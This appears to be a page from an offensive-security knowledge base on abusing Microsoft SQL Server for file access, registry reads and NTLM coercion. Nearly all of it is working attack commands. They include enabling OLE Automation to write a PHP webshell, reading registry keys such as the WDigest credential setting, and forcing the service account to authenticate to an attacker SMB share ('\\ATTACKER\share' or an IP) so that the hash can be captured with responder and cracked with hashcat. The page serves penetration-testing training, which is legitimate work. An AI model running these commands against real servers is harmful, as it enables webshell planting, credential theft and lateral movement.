Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 05. SQL / MSSQL

File Registry and Coercion

MSSQL can access files, registry keys, Windows identity mappings, and UNC paths through built-in procedures and providers.

These primitives matter even without direct command execution.


File And Directory Discovery

List directories:

EXEC xp_dirtree 'C:\', 1, 1;

Check file existence:

EXEC xp_fileexist 'C:\Windows\System32\drivers\etc\hosts';

Subdirectories:

EXEC xp_subdirs 'C:\Windows';

File Read With OPENROWSET

Check Ad Hoc Distributed Queries:

SELECT name, value_in_use
FROM sys.configurations
WHERE name='Ad Hoc Distributed Queries';

Enable when permitted:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;

Read a local file:

SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x;

Hosts file:

SELECT * FROM OPENROWSET(BULK N'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS Contents;

Remote query pivot:

SELECT name
FROM OPENROWSET('MSOLEDBSQL','Server=10.10.10.37;Trusted_Connection=Yes;','SELECT name FROM master.sys.databases');

Linked query:

SELECT * FROM OPENQUERY([LINKNAME], 'SELECT DB_NAME() AS db, @@SERVERNAME AS srv');

File Write With OLE

Enable OLE Automation:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

Create a file:

DECLARE @OLE INT;
DECLARE @FileID INT;
EXEC sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;
EXEC sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'C:\path\to\your\webshell.php', 8, 1;
EXEC sp_OAMethod @FileID, 'WriteLine', NULL, '<?php echo shell_exec($_GET["c"]);?>';
EXEC sp_OADestroy @FileID;
EXEC sp_OADestroy @OLE;

Registry Access

Use for host fingerprinting, secrets, credentials, and environment discovery through xp_reg*.

EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ActiveComputerName','ComputerName';
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\\CurrentControlSet\\Control\\Lsa','Security Packages';
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion','ProductName';
EXEC master..xp_regenumkeys 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProfileList';
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest','UseLogonCredential';

Windows Mapping

Discover Windows group mappings and login information:

EXEC xp_logininfo 'BUILTIN\\Administrators', 'members';
EXEC xp_logininfo;

UNC Path NTLM Coercion

These procedures can touch UNC paths:

xp_fileexist
xp_dirtree
xp_subdirs

Start a capture listener:

sudo responder -I tun0 -v

or:

sudo impacket-smbserver share ./ -smb2support

Coerce authentication:

EXEC master..xp_dirtree '\\ATTACKER\\share\\ping';
EXEC master..xp_subdirs '\\ATTACKER\\share\\ping';
EXEC master..xp_fileexist '\\ATTACKER\\share\\ping';

IP form:

EXEC xp_dirtree '\\10.10.110.17\share\';
EXEC xp_subdirs '\\10.10.110.17\share\';
EXEC xp_fileexist '\\10.10.110.17\share\';

If successful, the MSSQL Server service account authenticates to the rogue SMB server and exposes a NetNTLMv2 challenge-response.

Crack with hashcat mode 5600:

hashcat -m 5600 hashes.txt rockyou.txt

Use this to evaluate whether the SQL service account is a domain user and whether that identity can be relayed or cracked in the lab.